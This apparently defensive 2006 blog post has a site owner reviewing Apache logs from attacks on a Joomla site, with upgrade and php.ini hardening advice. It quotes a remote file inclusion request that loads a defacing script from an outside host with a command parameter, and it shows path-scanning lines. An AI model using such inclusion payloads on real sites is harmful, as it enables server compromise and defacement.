Select Page

Hackers are using scripts to hack my page…

Hackers  are using scripts to hack my page…
 I’ve already tried to reduce the surface of attack of my homepage by removing all un-needed components, modules, mambots but here is below what I’ve found into the log files…

Hackers trying remote code injection

were  found more than one time in apache error.log

[Thu Aug 17 17:29:05 2006] [error] [client 81.214.151.223] Invalid URI in request GET administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=[http://recon.reschat.dk/images/gallery/tool25.txt?cmd=id HTTP/1.0

Remember You should ASAP update the following components to their latest version:

  • com_securityimages < 3.0.5 use at least a version  > 3.0.6
  • com_hashcash < 1.2.1 use at least a version  > 1.2.2
  • com_bayesiannaivefilter has been developed but never release as a component, but it is still available at #Joomla forge developer tree.

This attack is trying to execute a scripts, locate at http://recon.reschat.dk/images/gallery/tool25.txt. If You go there, You’ll find that th script is readable and contains a header.

Defacing Tool 2.0 by xxxxxx

Defacing Tool 2.0 by xxxxxxx" is a suite of php based scripts that allows the attacker to send commands to the server primarily with the intent to deface websites.

Solutions:

  1. For com_bayesiannaivefilter sorry guys but I do not have this plugins nor it has ever been released in the wild. com_securityimages or com_hashcash, just Upgrade!
  2. If you manage a web host for which you are certain does not require the use of remote includes, you can disable that functionality in your php.ini configuration file by modifying the following variable. /etc/php.ini  allow_url_fopen = Off

 Hackers trying to access well known PHP files

each lines below at least more than 500 times…in 1 day

[Fri Aug 11 19:11:50 2006] [error] [client 221.87.148.77] Directory index forbidden by rule: /var/www/vhosts/waltercedric.com/httpdocs/components/com_htmlarea3_xtd-c/popups/ImageManager/
[Mon Jul 31 13:07:12 2006] [error] [client 85.108.201.139] user  not found: /administrator/components/com_bayesiannaivefilter/lang.php
[Mon Jul 31 13:07:19 2006] [error] [client 85.108.201.139] user admin: authentication failure for "/administrator/components/com_bayesiannaivefilter/lang.php": Password Mismatch
[Sat Feb 18 21:44:47 2006] [error] [client 80.218.20.20] File does not exist: /var/www/vhosts/waltercedric.com/httpdocs/var, referer: http://www.waltercedric.com/administrator/index2.php?option=com_zoom&Itemid=&page=upload&formtype=scan

Hacker trying to access  files that do not exist

  • /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/com_hashcash
  • wiki/administrator/
  • [Tue Aug 01 21:09:46 2006] [error] [client 200.120.37.70] user  not found: /administrator/components/com_uhp/uhp_config.php
  • [Tue Aug 01 20:43:03 2006] [error] [client 200.120.37.70] user  not found: /administrator/components/com_colophon/admin.colophon.php
  • [Mon Jul 31 20:11:25 2006] [error] [client 88.233.220.125] user  not found: /administrator/components/com_mgm/help.mgm.php

which look like programs brute forcing with a set of rules some paths searching well known vulnerability

Some strange attempts…

[Tue Aug 01 18:49:11 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/MSOffice
[Tue Aug 01 18:48:47 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/forums/httpdocs/_vti_bin
[Tue Aug 01 18:48:47 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/forums/httpdocs/MSOffice
[Tue Aug 01 18:49:11 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/_vti_bin
[Mon Jul 31 16:58:44 2006] [error] [client 207.46.98.40] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/demo/httpdocs/function.fopen
[Fri Jul 28 23:04:35 2006] [error] [client 85.103.107.26] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/path=attacker-example.com

About The Author

I worked with various Insurances companies across Switzerland on online applications handling billion premium volumes. I love to continuously spark my creativity in many different and challenging open-source projects fueled by my great passion for innovation and blockchain technology.In my technical role as a senior software engineer and Blockchain consultant, I help to define and implement innovative solutions in the scope of both blockchain and traditional products, solutions, and services. I can support the full spectrum of software development activities, starting from analyzing ideas and business cases and up to the production deployment of the solutions.I'm the Founder and CEO of Disruptr GmbH.

Categories